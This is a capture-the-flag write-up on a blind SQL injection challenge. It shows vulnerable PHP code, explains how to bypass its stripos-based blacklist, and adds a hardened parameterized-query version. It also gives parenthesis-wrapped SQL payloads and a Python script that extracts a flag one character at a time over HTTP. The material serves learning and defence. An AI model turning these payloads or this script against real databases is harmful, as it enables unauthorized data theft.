0x00 Preface
Embarrassingly, this seems to be the first blind injection challenge I have actually done (I must have seen them before, I just never went deep...).
I went straight to the writeup and reproduced it.
The attack technique is specific to this environment; the point is to get familiar with writing the script.
0x01 Reproduction
Pasting the source code first, to make the rest easier to follow:
```php
<?php
$dbuser='root';
$dbpass='root';
function safe($sql){
    # blacklisted content; the function barely filters anything
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
}
mysql_select_db("ctf",$db);
if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    if($query){
        $result = mysql_fetch_array($query);
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}
```
A bit of fuzz testing:
Every response of length 482 is "SQL Injection Checked."
Here is why some fuzz inputs that are on the blacklist still come back as bool(false) (a pitfall!):
```php
function safe($sql){
    # blacklisted content; the function barely filters anything
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}
```
Note that the check uses stripos, which returns the position of the first occurrence.
So if your fuzz payload puts the blacklisted token at the very beginning, stripos($id,$blackitem) returns 0, which is falsy, and the first layer is bypassed (safe() simply returns True).
```php
if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    if($query){
        $result = mysql_fetch_array($query);
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}
```
Reading further: because the resulting SQL statement has a syntax error, mysql_query fails and returns false, which is what gets var_dump'ed.
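For contrast, here is a hardened version of the two pieces analysed above (the stripos check and the interpolated query). This is an added example written for this writeup, not code from the challenge; it assumes a mysqli connection to the same "ctf" database and "passage" table, since the original mysql_* functions no longer exist in current PHP.

```php
<?php
// Added example, not part of the original challenge source. Assumes a
// mysqli connection to the "ctf" database with a "passage" table.

$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');

// stripos() returns int(0) when the needle sits at offset 0 and false when it
// is absent. The original `if(stripos($sql,$blackitem))` treats both as
// "not found", so a blacklisted token at the very start of the input passes.
// A strict comparison against false closes that hole.
function safe_fixed(string $sql, array $blackList): bool {
    foreach ($blackList as $blackitem) {
        if (stripos($sql, $blackitem) !== false) {
            return false;
        }
    }
    return true;
}

// A blacklist is still the wrong tool (the writeup shows spaces being replaced
// by parentheses). Since id is numeric, validate it as an integer and bind it
// as a parameter so the value is never parsed as SQL at all.
function fetch_content(mysqli $db, string $id): ?string {
    if (!preg_match('/^[0-9]{1,10}$/', $id)) {
        return null;
    }
    $idInt = (int)$id;
    $stmt = $db->prepare('SELECT content FROM passage WHERE id = ? LIMIT 0,1');
    $stmt->bind_param('i', $idInt);
    $stmt->execute();
    $stmt->bind_result($content);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $content : null;
}

$db = new mysqli('localhost', 'root', 'root', 'ctf');
if ($db->connect_error) {
    die('connect failed: ' . $db->connect_error);
}
$id = $_POST['id'] ?? '';
$content = fetch_content($db, $id);
echo $content === null ? 'Error Occured When Fetch Result.' : $content;
```

With the strict comparison, safe_fixed('or(1)', $blackList) returns false where the original safe() returned True (stripos hit offset 0). fetch_content() then makes the blacklist irrelevant to correctness: a non-numeric id is rejected before any query is built, and a numeric one is bound as an integer parameter, so the boolean difference between id=1 and id=0 that the blind injection relies on can no longer be driven by SQL expressions.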
Since the responses for 0 and 1 differ, we can do a boolean-based blind injection.
The space filter can be bypassed by wrapping terms in parentheses:
```sql
select(flag)from(flag)
ascii(substr((select(flag)from(flag)),1,1))=102 # ASCII of 'f'
id=if((ascii(substr((select(flag)from(flag)),1,1))=102),1,0)
```
When the ASCII value is correct, the page returns Hello,g…girlfriend.
I recommend writing a Python script for this.
Pasting the one I wrote myself:
```python
import requests

url = 'http://c3da9e81-43de-4a6e-8020-b5691bb84f33.node4.buuoj.cn:81/'
result = ''
# l: character position in the flag; i: candidate ASCII value
for l in range(1, 43):
    for i in range(32, 128):
        payload = 'if((ascii(substr((select(flag)from(flag)),%d,1))=%d),1,0)' % (l, i)
        data = {'id': payload}
        res = requests.post(url, data=data)
        res.encoding = res.apparent_encoding
        # a true comparison makes id=1, which returns the "girlfriend" passage
        if 'girlfriend' in res.text:
            result += chr(i)
            print(result)
            break
        if '}' in result:
            break
    if '}' in result:
        break
print(result)
```
References
https://www.cnblogs.com/20175211lyz/p/11435298.html
https://blog.csdn.net/m0_46587008/article/details/110304855
0x02 Rethink
I have to say, SQL injection really comes down to experience.
And mine is lacking, that's for sure.